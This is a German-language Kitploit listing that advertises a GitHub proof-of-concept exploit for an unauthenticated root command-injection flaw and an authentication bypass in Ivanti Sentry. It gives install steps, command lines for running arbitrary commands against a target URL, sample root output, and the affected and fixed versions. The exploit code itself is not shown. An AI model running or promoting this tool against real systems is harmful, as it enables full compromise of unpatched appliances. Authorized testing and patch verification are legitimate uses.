Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-10520
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Repository anzeigen
4vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

Remote-Code-Ausführung ohne Authentifizierung + Authentifizierungsumgehung

Autor: Ashraf Zaryouh "0xBlackash"

GitHub


📌 Überblick

Zwei kritische Schwachstellen, die Ivanti Sentry (ehemals MobileIron Sentry) betreffen:

  • CVE-2026-10520 → CVSS 10.0 - OS-Befehlsinjektion ohne Authentifizierung (RCE als root)
  • CVE-2026-10523 → CVSS 9.9 - Authentifizierungsumgehung

Diese Schwachstellen ermöglichen es nicht authentifizierten Angreifern, das gesamte System zu kompromittieren.


✨ Funktionen

  • ✅ Sauberer und schneller PoC
  • ✅ Keine Authentifizierung (keine Anmeldedaten erforderlich)
  • ✅ Befehlsausführung auf Root-Ebene
  • ✅ Detaillierte Ausgabeformatierung
  • ✅ Proxy-Unterstützung
  • ✅ Ausführlicher Modus
  • ✅ Schöne Terminal-Oberfläche

🚀 Verwendung

root@kitploit:~
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>

Beispiele

root@kitploit:~
# Basic usage
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# Verbose mode
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# With proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# Check kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 Optionen


🛠️ Installation

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 Erfolgreiche Ausnutzung

Wenn angreifbar, sehen Sie:

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungs- und autorisierte Sicherheitstests bestimmt.
Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören, ist illegal.
Der Autor übernimmt keine Verantwortung für Missbrauch.


🔧 Betroffene Versionen

  • Ivanti Sentry vor 10.5.2, 10.6.2, 10.7.1

Behoben in: 10.5.2 / 10.6.2 / 10.7.1


📜 Referenzen

  • Offizielle Ivanti Advisory
  • Originalforschung von watchTowr Labs
  • NVD-Einträge: CVE-2026-10520, CVE-2026-10523

Erstellt mit ❤️ von Ashraf Zaryouh "0xBlackash"

Star das Repository, wenn es dir geholfen hat! ⭐

Tool herunterladen
ArgumentBeschreibungErforderlich
--urlZiel-URL (z.B. https://target:8443)Ja
--cmdAuszuführender BefehlJa
-v, --verboseAusführliche Ausgabe aktivierenNein
--proxyHTTP-Proxy (Host:Port)Nein